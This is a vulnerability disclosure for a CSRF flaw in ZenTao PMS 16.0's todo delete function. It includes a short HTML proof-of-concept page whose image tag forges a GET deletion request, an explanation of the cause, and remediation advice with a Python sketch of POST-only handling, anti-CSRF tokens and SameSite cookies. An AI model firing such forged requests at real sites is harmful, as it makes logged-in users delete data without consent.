Cross-Site Request Forgery (CSRF) in easysoft/zentaopms
Dec 26th 2021
Zentaopms 16.0 is vulnerable to CSRF in the delete functionality.
Proof of Concept
1 - Go to the My section and create a todo.
2 - Browse to http://127.0.0.1/zentaopms/www/index.php?m=my&f=todo&type=all&userID=&status=all&orderBy=id_desc and take note of the todo ID in the first column.
3 - Create the following page (use the ID found at step 2) and visit it in another browser tab while the admin is authenticated.

    <html>
    <body>
    <!-- forged GET to the delete endpoint; the browser sends the admin's session cookie with it -->
    <img src="http://127.0.0.1/zentaopms/www/index.php?m=todo&f=delete&todoID=1&confirm=yes">
    </body>
    </html>

4 - The todo identified by ID 1 will be deleted.
The vulnerability is present because the function at https://github.com/easysoft/zentaopms/blob/master/www/js/my.full.js#L319 performs the delete operation with a GET request and no anti-CSRF token is checked by the server.
This vulnerability allows an attacker to force an end user to execute unwanted actions on the web application.
For all the operations which change state on the server (add, edit, delete, etc.):
1 - Use an HTTP POST request.
2 - Use an unpredictable, cryptographically strong anti-CSRF token sent along with the POST request.
3 - Set SameSite=Lax or SameSite=Strict on the session cookie.
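As an added example (not code from the report or from the ZenTao code base), the following Python sketch shows the three recommended controls together on the server side: a delete handler that refuses non-POST requests, a per-session HMAC-based anti-CSRF token that is verified in constant time, and a session cookie emitted with SameSite=Strict. The function names, the cookie name `sid` and the server secret are assumptions for the illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed server-side secret for the example; a real deployment keeps this out of source.
SERVER_SECRET = b"example-secret-do-not-reuse"


def issue_csrf_token(session_id: str, secret: bytes = SERVER_SECRET) -> str:
    """Bind a random nonce to the session with an HMAC; embed the result in every state-changing form."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def token_is_valid(session_id: str, token: str, secret: bytes = SERVER_SECRET) -> bool:
    """Recompute the MAC for this session and compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def handle_todo_delete(method: str, session_id: str, body: str, secret: bytes = SERVER_SECRET):
    """Hardened equivalent of m=todo&f=delete. Returns (status, message)."""
    # Control 1: a forged <img> tag can only produce a GET, so it stops here.
    if method != "POST":
        return 405, "state-changing request must use POST"
    params = parse_qs(body)
    # Control 2: a forged cross-site POST cannot read the victim's token, so it stops here.
    token = params.get("csrf_token", [""])[0]
    if not token_is_valid(session_id, token, secret):
        return 403, "missing or invalid anti-CSRF token"
    todo_id = params.get("todoID", [""])[0]
    if not todo_id.isdigit():
        return 400, "bad todoID"
    return 200, f"todo {todo_id} deleted"


def session_cookie_header(session_id: str) -> str:
    """Control 3: the cookie is not attached to cross-site requests at all."""
    return f"sid={session_id}; Path=/; HttpOnly; Secure; SameSite=Strict"
```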